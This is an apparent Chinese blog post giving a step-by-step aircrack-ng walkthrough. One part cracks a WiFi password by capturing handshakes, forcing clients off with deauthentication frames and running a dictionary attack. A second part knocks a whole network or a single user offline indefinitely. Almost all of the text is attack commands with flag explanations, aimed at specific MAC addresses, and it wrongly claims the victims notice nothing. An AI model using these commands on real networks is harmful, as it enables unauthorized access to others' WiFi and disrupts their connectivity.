密码破解
1.无线网卡切换到监听模式 具体参考:https://blog.csdn.net/whatday/article/details/86494254
2.airodump-ng wlan0
列出所有的wifi信号 得到需要破解的wifi对应的mac 如图
这里选取 B0:95:8E:9B:7C:E8这个wifi设备
3.airodump-ng wlan0 --ivs -c 6 --bssid B0:95:8E:9B:7C:E8 -w test
抓取wifi的握手数据包 同时使用第4步让指定用户断开 这样拿到握手包
--ivs 是通过ivs过滤,只保留可以破解密码的报文.ivs文件,这样比较快点
-c 后面跟频道,如这里的6
-w 是将抓取的报文写入命名为 test 并保存(之后会在当前文件夹保存为test-01.ivs)
4.新开一个shell执行 aireplay-ng -0 200 -c 84:4B:F5:49:53:BA -a B0:95:8E:9B:7C:E8 wlan0
针对指定wifi的mac 指定的用户进行攻击 让用户断开wifi 当用户重连时 第3步中的命令可以抓到握手包
需要注意 由于用户wifi断开后会自动重连 所以用户端基本没有感觉 也不能对攻击用户造成任何影响
-a 是路由器的mac
-c 是需要攻击的用户mac
-0 是攻击次数
5. aircrack-ng -w pass.txt test-01.ivs
-w 是字典文件
test-01.ivs 是包含握手包的数据包
如果失败会显示:Got no data packets from target network!
成功会显示:
攻击
1.查看本地无线网卡名称
2.列出所有的wifi信号 airodump-ng wlan0
3.查看需要攻击的wifi的 BSSID(mac) 和 CH(信道), 这里选择wifi的BSSID是B0:95:8E:9B:7C:E8 信道是6
4.设置本地网卡信道 iwconfig wlan0 channel 6
攻击整体wifi
aireplay-ng -0 0 -a B0:95:8E:9B:7C:E8 wlan0 攻击效果是此wifi不能连接
-0 是攻击次数 0表示无限次
wlan0 是本地无线网卡名称
攻击对应wifi的单一用户
1.airodump-ng wlan0 -c 6 --bssid B0:95:8E:9B:7C:E8 得到连接该wifi的用户mac列表
-c 是信道,如这里的6
2.aireplay-ng -0 0 -c 84:A1:34:B2:2A:F6 -a B0:95:8E:9B:7C:E8 wlan0
-c 是需要攻击的用户mac
-a 是需要攻击的wifi的BSSID
-0 是攻击次数 0表示无限次 如果设置200 攻击完200此后将停止,该用户会自动再次连接上该wifi
wlan0 是本地无线网卡名称
扫一扫
1507
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
